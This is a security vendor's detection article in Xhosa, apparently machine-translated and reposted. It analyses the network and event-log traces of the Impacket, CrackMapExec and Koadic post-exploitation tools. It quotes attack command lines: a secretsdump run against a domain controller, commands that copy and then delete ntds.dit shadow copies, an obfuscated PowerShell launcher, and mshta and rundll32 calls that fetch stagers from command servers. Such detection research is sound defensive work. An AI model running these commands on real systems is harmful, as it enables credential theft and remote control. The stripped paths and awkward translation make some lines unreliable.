ProHoster > Ibhulogi > Ulawulo > Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker

Inani lokuhlaselwa kwicandelo loshishino likhula minyaka yonke: umzekelo ngo 2017, 13% ngakumbi iziganeko ezizodwa zabhalwa kunokuba ngo-2016, kwaye ekupheleni kuka-2018 - I-27% yeziganeko ezingaphezulukunakwixesha elidlulileyo. Kubandakanya ezo apho isixhobo esisebenzayo sisisiseko seWindows. Ngo-2017-2018, i-APT Dragonfly, APT28, APT MuddyWater benze uhlaselo kurhulumente kunye nemibutho yomkhosi eYurophu, kuMntla Merika naseSaudi Arabia. Kwaye sasebenzisa izixhobo ezithathu kule nto- Impacket, CrackMapExec ΠΈ Koadic. Ikhowudi yabo yomthombo ivulekile kwaye iyafumaneka kwi-GitHub.

Kuyafaneleka ukuba uqaphele ukuba ezi zixhobo azisetyenziselwa ukungena okokuqala, kodwa ukuphuhlisa ukuhlaselwa ngaphakathi kweziseko zophuhliso. Abahlaseli bawasebenzisa kumanqanaba ahlukeneyo ohlaselo emva kokungena komjikelezo. Oku, ngendlela, kunzima ukukubona kwaye kaninzi kuphela ngoncedo lweteknoloji ukuchonga imikhondo yokulalanisa kwitrafikhi yothungelwano okanye izixhobo ezivumelayo Fumana iintshukumo ezisebenzayo zomhlaseli emva kokuba engene kwisiseko. Izixhobo zibonelela ngemisebenzi eyahlukeneyo, ukusuka ekudluliseleni iifayile ekusebenzisaneni kunye nerejista kunye nokwenza imiyalelo kumatshini okude. Senze uphononongo ngezi zixhobo ukumisela umsebenzi wabo womnatha.

Oko bekufuneka sikwenze:

  • Qonda ukuba zisebenza njani izixhobo zokuqhekeza. Fumana ukuba ngabaphi abahlaseli kufuneka baxhaphaze kwaye bubuphi ubuchwephesha abanobusebenzisa.
  • Fumana into engabonwanga ngezixhobo zokhuseleko lolwazi kwizigaba zokuqala zohlaselo. Isigaba sokuhlaziya sinokunqunyulwa, mhlawumbi ngenxa yokuba umhlaseli ungumhlaseli wangaphakathi, okanye ngenxa yokuba umhlaseli usebenzisa umngxuma kwisiseko esingaziwa ngaphambili. Kuba kunokwenzeka ukubuyisela yonke ikhonkco lezenzo zakhe, ngoko ke umnqweno wokubona ukunyakaza okuqhubekayo.
  • Ukuphelisa iimpembelelo zobuxoki kwizixhobo zokubona ukungena. Akufanele sikhohlwe ukuba xa izenzo ezithile zifunyenwe ngesiseko sokuhlaziywa kuphela, iimpazamo eziqhelekileyo zinokwenzeka. Ngokuqhelekileyo kwiziseko zophuhliso kukho inani elaneleyo leendlela, ezingabonakaliyo kwizinto ezisemthethweni ekuboneni kokuqala, ukufumana naluphi na ulwazi.

Ezi zixhobo zibanika ntoni abahlaseli? Ukuba le yi-Impacket, ke abahlaseli bafumana ilayibrari enkulu yeemodyuli ezinokuthi zisetyenziswe kumanqanaba ahlukeneyo ohlaselo olulandelayo emva kokuphula i-perimeter. Izixhobo ezininzi zisebenzisa iimodyuli ze-Impacket ngaphakathi - umzekelo, iMetasploit. Ine-dcomexec kunye ne-wmiexec yokuphunyezwa komyalelo okude, i-secretsdump yokufumana ii-akhawunti kwimemori ezongeziweyo kwi-Impacket. Ngenxa yoko, ukufumanisa okuchanekileyo komsebenzi wethala leencwadi kuya kuqinisekisa ukufunyanwa kwezinto eziphuma kuzo.

Akumangalisi ukuba abadali babhale "Ixhaswe yi-Impacket" malunga ne-CrackMapExec (okanye i-CME ngokulula). Ukongeza, i-CME inomsebenzi osele ulungele iimeko ezidumileyo: I-Mimikatz yokufumana amagama ayimfihlo okanye i-hashes yabo, ukuphunyezwa kwe-Meterpreter okanye i-empire agent ukwenzela ukubulawa kude, kunye ne-Bloodhound ebhodini.

Isixhobo sesithathu esisikhethileyo yi-Koadic. Kutshanje, yavezwa kwinkomfa ye-hacker yamazwe ngamazwe i-DEFCON 25 kwi-2017 kwaye ihlukaniswe ngendlela engekho-standard: isebenza nge-HTTP, i-Java Script kunye ne-Microsoft Visual Basic Script (VBS). Le ndlela ibizwa ngokuba kukuphila ngaphandle komhlaba: isixhobo sisebenzisa uluhlu lwabaxhomekeke kunye namathala eencwadi akhelwe kwiiWindows. Abadali bayibiza ngokuba yi-COM Command & Control, okanye iC3.

IMPACKET

Ukusebenza kwe-Impacket kubanzi kakhulu, ukusuka kwi-reconnaissance ngaphakathi kwe-AD kunye nokuqokelela idatha kwiiseva zangaphakathi ze-MS SQL, kwiindlela zokufumana iziqinisekiso: olu luhlaselo lwe-SMB relay, kunye nokufumana ifayile ye-ntds.dit equlethe i-hashes ye-passwords yomsebenzisi ukusuka kumlawuli wesizinda. I-Impacket iphinda iphumeze imiyalelo ukude isebenzisa iindlela ezine ezahlukeneyo: i-WMI, iNkonzo yoLawulo lwe-Windows Scheduler, i-DCOM, kunye ne-SMB, kwaye ifuna iimqinisekiso ukwenza njalo.

Ukulahla okufihlakeleyo

Makhe sijonge kwi-secrets dump. Le yimodyuli enokuthi ijolise kubo bobabini oomatshini bomsebenzisi kunye nabalawuli besizinda. Ingasetyenziselwa ukufumana iikopi zeendawo zememori LSA, SAM, SECURITY, NTDS.dit, ngoko inokubonwa kwizigaba ezahlukeneyo zohlaselo. Inyathelo lokuqala ekusebenzeni kwemodyuli kukuqinisekiswa nge-SMB, efuna nokuba igama eligqithisiweyo lomsebenzisi okanye i-hash yayo ngokuzenzekelayo iqhube uhlaselo lweHash ngokuzenzekelayo. Okulandelayo kuza isicelo sokuvula ukufikelela kuMphathi woLawulo lweNkonzo (SCM) kwaye ufumane ukufikelela kwirejista ngokusebenzisa i-protocol ye-winreg, esebenzisa apho umhlaseli angakwazi ukufumana idatha yamasebe omdla kwaye afumane iziphumo nge-SMB.

KwiFig. 1 sibona ukuba ngokuchanekileyo xa usebenzisa i-protocol ye-winreg, ukufikelela kufumaneka ngokusebenzisa iqhosha lokubhalisa kunye ne-LSA. Ukwenza oku, sebenzisa umyalelo we-DCERPC nge-opcode 15-OpenKey.

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Irayisi. 1. Ukuvula iqhosha lokubhalisa usebenzisa iprotocol ye-winreg

Okulandelayo, xa ukufikelela kwisitshixo kufunyenwe, amaxabiso agcinwa ngomyalelo we-SaveKey nge-opcode 20. I-Impacket yenza oku ngendlela ecacileyo. Igcina amaxabiso kwifayile egama layo linguluhlu lwamagama asi-8 ahlonyelwe nge .tmp. Ukongeza, ukulayishwa okungaphezulu kwale fayile kwenzeka nge-SMB kwi-System32 directory (Fig. 2).

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Irayisi. 2. Inkqubo yokufumana isitshixo sobhaliso kumatshini okude

Kuvela ukuba umsebenzi onjalo kuthungelwano unokufunyanwa ngemibuzo kumasebe athile obhaliso usebenzisa i-protocol ye-winreg, amagama athile, imiyalelo kunye nomyalelo wabo.

Le modyuli ikwashiya umkhondo kwilog yesiganeko seWindows, isenza kube lula ukuyibona. Umzekelo, ngenxa yokuphumeza umyalelo

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Kwi-Windows Server 2016 log siza kubona olu luhlu lulandelayo lweziganeko:

1. 4624 - ekude Logon.
2. 5145 - ukujonga amalungelo okufikelela kwinkonzo ekude ye-winreg.
3. 5145 - ukujonga amalungelo okufikelela kwifayile kwi-System32 directory. Ifayile inegama elingaqhelekanga elikhankanywe ngasentla.
4. 4688 - ukwenza inkqubo ye-cmd.exe evula i-vsadmin:

β€œC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ukwenza inkqubo ngomyalelo:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - ukwenza inkqubo ngomyalelo:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - ukwenza inkqubo ngomyalelo:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Njengezixhobo ezininzi zokuxhaphaza emva, i-Impacket ineemodyuli zokwenza imiyalelo ekude. Siza kugxila kwi-smbexec, ebonelela ngeqokobhe lomyalelo osebenzayo kumatshini okude. Le modyuli ikwafuna uqinisekiso nge-SMB, nokuba kungegama lokugqitha okanye igama lokugqitha. Kumfanekiso. Kwi-Figure 3 sibona umzekelo wendlela isixhobo esinjalo sisebenza ngayo, kulo mzekelo ngumlawuli wendawo we-console.

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Irayisi. 3. Interactive smbexec console

Inyathelo lokuqala le-smbexec emva kokuqinisekiswa kukuvula i-SCM ngomyalelo we-OpenSCManagerW (15). Umbuzo uphawuleka: indawo yeGama loMshini ngu-DUMMY.

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Irayisi. 4. Isicelo sokuvula uMphathi woLawulo lweNkonzo

Emva koko, inkonzo yenziwa ngokusebenzisa i-CreateServiceW umyalelo (12). Kwimeko ye-smbexec, sinokubona umyalelo ofanayo wokwakha umyalelo rhoqo. KwiFig. I-5 eluhlaza ibonisa iiparamitha zomyalelo ezingatshintshiyo, umthubi ubonisa ukuba umhlaseli unokutshintsha ntoni. Kulula ukubona ukuba igama lefayile ephunyeziweyo, ulawulo lwayo kunye nefayile yemveliso inokutshintshwa, kodwa okunye kunzima kakhulu ukutshintsha ngaphandle kokuphazamisa ingqiqo ye-Impacket module.

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Irayisi. 5. Isicelo sokwenza inkonzo usebenzisa uMphathi woLawulo lweNkonzo

I-Smbexec ikwashiya umkhondo ocacileyo kwilog yomcimbi weWindows. Kwi-Windows Server 2016 log yeqokobhe lomyalelo osebenzisanayo kunye nomyalelo we-ipconfig, siya kubona olu luhlu lulandelayo lweziganeko:

1. 4697 - ukufakwa kwenkonzo kumatshini wexhoba:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - ukudalwa kwenkqubo ye-cmd.exe kunye neengxabano ezivela kwinqaku loku-1.
3. 5145 - ukujonga amalungelo okufikelela kwi-__output file kwi C$ directory.
4. 4697 - ukufakwa kwenkonzo kumatshini wexhoba.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ukudalwa kwenkqubo ye-cmd.exe kunye neengxabano ezivela kwinqaku loku-4.
6. 5145 - ukujonga amalungelo okufikelela kwi-__output file kwi C$ directory.

I-Impacket isisiseko sokuphuhliswa kwezixhobo zokuhlasela. Ixhasa phantse zonke iiprothokholi kwisiseko seWindows kwaye kwangaxeshanye ineempawu zayo. Nazi izicelo ezithile ze-winreg, kunye nokusetyenziswa kwe-SCM API enokwakheka komyalelo weempawu, kunye nefomathi yegama lefayile, kunye nesabelo se-SMB SYSTEM32.

CRACKMAPEXEC

Isixhobo se-CME senzelwe ukuba sizenze ngokuzenzekelayo ezo ntshukumo zesiqhelo ekufuneka umhlaseli enze ngazo ukuqhubela phambili ngaphakathi kuthungelwano. Ikuvumela ukuba usebenze ngokubambisana nearhente eyaziwayo ye-Empire kunye ne-Meterpreter. Ukwenza imiyalelo ngokufihlakeleyo, i-CME inokuyiphazamisa. Ukusebenzisa i-Bloodhound (isixhobo esahlukileyo sokuhlaziya), umhlaseli angenza ngokuzenzekelayo ukukhangela iseshoni yomlawuli wesizinda esisebenzayo.

Igazi

I-Bloodhound, njengesixhobo esizimeleyo, ivumela ukuqwalaselwa okuphambili ngaphakathi kwenethiwekhi. Iqokelela idatha malunga nabasebenzisi, oomatshini, amaqela, iiseshoni kwaye inikezelwa njengeskripthi se-PowerShell okanye ifayile yokubini. I-LDAP okanye i-SMB-based protocols isetyenziselwa ukuqokelela ulwazi. Imodyuli yokudibanisa i-CME ivumela i-Bloodhound ukuba ikhutshwe kumatshini wexhoba, iqhube kwaye ifumane idatha eqokelelweyo emva kokubulawa, ngokwenza oko ngokuzenzekelayo izenzo kwinkqubo kwaye ibenze bangabonakali. Igobolondo lomzobo we-Bloodhound libonisa idatha eqokelelweyo ngendlela yeegrafu, ekuvumela ukuba ufumane eyona ndlela imfutshane ukusuka kumatshini womhlaseli ukuya kumlawuli wesizinda.

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Irayisi. 6. I-Bloodhound Interface

Ukuze usebenze kumatshini wexhoba, imodyuli yenza umsebenzi usebenzisa i-ATSVC kunye ne-SMB. I-ATSVC lujongano lokusebenza kunye ne-Windows Task Scheduler. I-CME isebenzisa i-NetrJobAdd(1) umsebenzi wayo ukwenza imisebenzi phezu komsebenzi womnatha. Umzekelo wento ethunyelwa yimodyuli ye-CME iboniswe kuMfanekiso. 7: Lo ngumyalelo womnxeba we-cmd.exe kunye nekhowudi e-obfuscated ngendlela yeengxabano kwifomathi ye-XML.

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Umfanekiso wesi-7. Ukwenza umsebenzi ngeCME

Emva kokuba umsebenzi uthunyelwe ukubulawa, umatshini wexhoba uqala i-Bloodhound ngokwayo, kwaye oku kunokubonwa kwi-traffic. Imodyuli ibonakaliswe yimibuzo ye-LDAP ukufumana amaqela asemgangathweni, uluhlu lwabo bonke oomatshini kunye nabasebenzisi kwi-domain, kwaye ufumane ulwazi malunga neeseshoni zomsebenzisi osebenzayo ngesicelo se-SRVSVC NetSessEnum.

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Irayisi. 8. Ukufumana uluhlu lweeseshoni ezisebenzayo nge-SMB

Ukongeza, ukuqaliswa kwe-Bloodhound kumatshini wexhoba kunye nophicotho-zincwadi olunikwe amandla luhamba kunye nomsitho one-ID 4688 (ukudala inkqubo) kunye negama lenkqubo. Β«C:WindowsSystem32cmd.exeΒ». Yintoni ephawulekayo ngayo ziingxoxo zomgca womyalelo:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Imodyuli ye-enum_avproducts inomdla kakhulu ukusuka kwindawo yokujonga ukusebenza kunye nokuphunyezwa. I-WMI ikuvumela ukuba usebenzise ulwimi lwe-WQL lombuzo ukubuyisela idatha kwizinto ezahlukeneyo ze-Windows, eyona nto isetyenziswa yile modyuli ye-CME. Ivelisa imibuzo kwiiklasi ze-AntiSpywareProduct kunye ne-AntiМirusProduct malunga nezixhobo zokukhusela ezifakwe kumatshini wexhoba. Ukuze ufumane idatha efunekayo, imodyuli idibanisa kwi-rootSecurityCenter2 indawo yamagama, emva koko ivelise umbuzo we-WQL kwaye ifumana impendulo. Kumfanekiso. Umzobo 9 ubonisa imixholo yezicelo ezinjalo kunye neempendulo. Kumzekelo wethu, iWindows Defender yafunyanwa.

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Irayisi. 9. Umsebenzi womnatha wemodyuli ye-enum_avproducts

Rhoqo, uphicotho lwe-WMI (Trace WMI-Activity), apho iziganeko onokufumana kuzo ulwazi oluluncedo malunga nemibuzo ye-WQL, lunokuvalwa. Kodwa ukuba yenziwe, ukuba iscript se-enum_avproducts siqhutywa, isiganeko esine-ID 11 siya kugcinwa siqulathe igama lomsebenzisi othumele isicelo kunye negama kwi-rootSecurityCenter2.

Imodyuli nganye ye-CME yayinezinto zayo zakudala, ingaba yimibuzo ethile ye-WQL okanye ukuyilwa kohlobo oluthile lomsebenzi kumcwangcisi wemisebenzi eno-obfuscation kunye nomsebenzi othe ngqo we-Bloodhound kwi-LDAP kunye ne-SMB.

KOADIC

Uphawu olwahlukileyo lwe-Koadic kukusetyenziswa kweJavaScript kunye neetoliki zeVBScript ezakhelwe kwiWindows. Ngale ndlela, ilandela indlela yokuphila emhlabeni - oko kukuthi, ayinakuxhomekeka kwangaphandle kwaye isebenzisa izixhobo eziqhelekileyo zeWindows. Esi sixhobo soMyalelo kunye noLawulo olupheleleyo (CnC), ekubeni emva kokusuleleka kwintsholongwane "i-implant" ifakwe kumatshini, ukuvumela ukuba ilawulwe. Umatshini onjalo, kwisigama se-Koadic, ubizwa ngokuba yi "zombie". Ukuba kukho amalungelo angonelanga okusebenza ngokupheleleyo kwicala lexhoba, i-Koadic inamandla okuziphakamisa ngokusebenzisa iindlela zokuLawula iAkhawunti yoMsebenzisi (UAC bypass).

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Irayisi. 10. I-Koadic Shell

Ixhoba kufuneka liqalise unxibelelwano kunye noMyalelo nomncedisi woLawulo. Ukwenza oku, kufuneka aqhagamshelane ne-URI elungiselelwe ngaphambili kwaye afumane umzimba oyintloko we-Koadic usebenzisa enye yesiteji. Kumfanekiso. Umfanekiso we-11 ubonisa umzekelo we-stager ye-mshta.

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Irayisi. 11. Ukuqalisa iseshoni ngeseva ye-CnC

Ngokusekwe kulwahlulo lwempendulo ye-WS, kuyacaca ukuba uphumezo lwenzeka nge-WScript.Shell, kwaye ii-variables STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE ziqulathe ulwazi olungundoqo malunga neeparamitha zeseshoni yangoku. Esi sisibini sokuqala sempendulo kuqhagamshelwano lweHTTP kunye nomncedisi we CnC. Izicelo ezilandelayo zinxulumene ngokuthe ngqo nokusebenza kweemodyuli ezibizwa ngokuba (iimplants). Zonke iimodyuli ze-Koadic zisebenza kuphela ngeseshoni esebenzayo kunye ne-CnC.

IMimikatz

Kanye njengokuba i-CME isebenza kunye ne-Bloodhound, i-Koadic isebenza kunye ne-Mimikatz njengenkqubo eyahlukileyo kwaye ineendlela ezininzi zokuyisungula. Apha ngezantsi kukho isibini sempendulo yesicelo sokukhuphela ukufakelwa kweMimikatz.

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Irayisi. 12. Dlulisa i-Mimikatz kwi-Koadic

Ungabona indlela i-URI ifomathi kwisicelo etshintshile ngayo. Ngoku iqulethe ixabiso le-csrf variable, enoxanduva lwemodyuli ekhethiweyo. Musa ukukhangela kwigama lakhe; Sonke siyazi ukuba iCSRF ihlala iqondwa ngokwahlukileyo. Impendulo yayingumzimba ofanayo we-Koadic, apho ikhowudi ehambelana ne-Mimikatz yongezwa. Inkulu kakhulu, ngoko ke makhe sijonge amanqaku aphambili. Apha sinelayibrari ye-Mimikatz efakwe kwi-base64, iklasi ye-serialized .NET eya kuyifaka, kunye neengxabano zokusungula i-Mimikatz. Isiphumo sokwenziwa sigqithiselwa kwinethiwekhi ngokubhaliweyo okucacileyo.

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Irayisi. 13. Isiphumo sokusebenzisa iMimikatz kumatshini okude

Exec_cmd

I-Koadic ikwanazo neemodyuli ezinokwenza imiyalelo ukude. Apha siza kubona indlela yokuvelisa i-URI efanayo kunye ne-sid eqhelekileyo kunye ne-csrf variables. Kwimeko yemodyuli exec_cmd, ikhowudi yongezwa kumzimba okwaziyo ukwenza imiyalelo yeqokobhe. Ngezantsi kuboniswa ikhowudi enjalo equlethwe kwimpendulo ye-HTTP yomncedisi we-CnC.

Ulubona njani uhlaselo kwiziseko zeWindows: ukufunda izixhobo ze-hacker
Irayisi. 14. Faka ikhowudi exec_cmd

I-GAWTUUGCFI eguquguqukayo kunye nophawu lwe-WS oluqhelekileyo luyafuneka kuphunyezo lwekhowudi. Ngoncedo lwayo, i-implant ibiza i-shell, iqhubekisela phambili amasebe amabini ekhowudi - i-shell.exec kunye nokubuyiswa komlambo wedatha ophumayo kunye ne-shell.run ngaphandle kokubuya.

I-Koadic ayisosixhobo esiqhelekileyo, kodwa inezinto zayo zakudala apho inokufumaneka khona kwitrafikhi esemthethweni:

  • ukwenziwa okukhethekileyo kwezicelo zeHTTP,
  • usebenzisa i-winHttpRequests API,
  • ukwenza into yeWscript.Shell ngeActiveXObject,
  • umzimba omkhulu ophunyezwayo.

Uqhagamshelo lokuqala luqaliswe yi-stager, ngoko ke kunokwenzeka ukufumanisa umsebenzi wayo ngeziganeko zeWindows. Kwi-mshta, lo ngumcimbi we-4688, obonisa ukudalwa kwenkqubo kunye nophawu lokuqala:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Ngelixa i-Koadic iqhuba, unokubona ezinye iziganeko ze-4688 ezineempawu ezibonisa ngokugqibeleleyo:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

ezifunyanisiweyo

Ukuphila ngokuphila emhlabeni kuyanda kwizaphuli-mthetho. Basebenzisa izixhobo kunye neendlela ezakhiwe kwiiWindows kwiimfuno zabo. Sibona izixhobo ezidumileyo i-Koadic, i-CrackMapExec kunye ne-Impacket elandela lo mgaqo usanda kuvela kwiingxelo ze-APT. Inani leefolokhwe kwi-GitHub kwezi zixhobo nazo ziyakhula, kwaye ezintsha zivela (sele sele zimalunga newaka ngoku). Umkhwa ufumana ukuthandwa ngenxa yokulula kwawo: abahlaseli abafuni izixhobo zeqela lesithathu; Sigxila ekufundeni unxibelelwano lwenethiwekhi: isixhobo ngasinye esichazwe ngasentla sishiya umkhondo waso kwitrafikhi yenethiwekhi; uphononongo oluneenkcukacha kubo wasivumela ukuba sifundise imveliso yethu I-PT Network Attack Discovery babhaqe, nto leyo enceda ekugqibeleni ukuphanda lonke ikhonkco lezehlo ze-cyber ezibandakanya bona.

Authors:

  • U-Anton Tyurin, iNtloko yeSebe leeNkonzo zeNgcali, i-PT Expert Security Centre, i-Positive Technologies
  • U-Egor Podmokov, ingcali, i-PT Expert Security Centre, i-Positive Technologies

umthombo: www.habr.com

Yongeza izimvo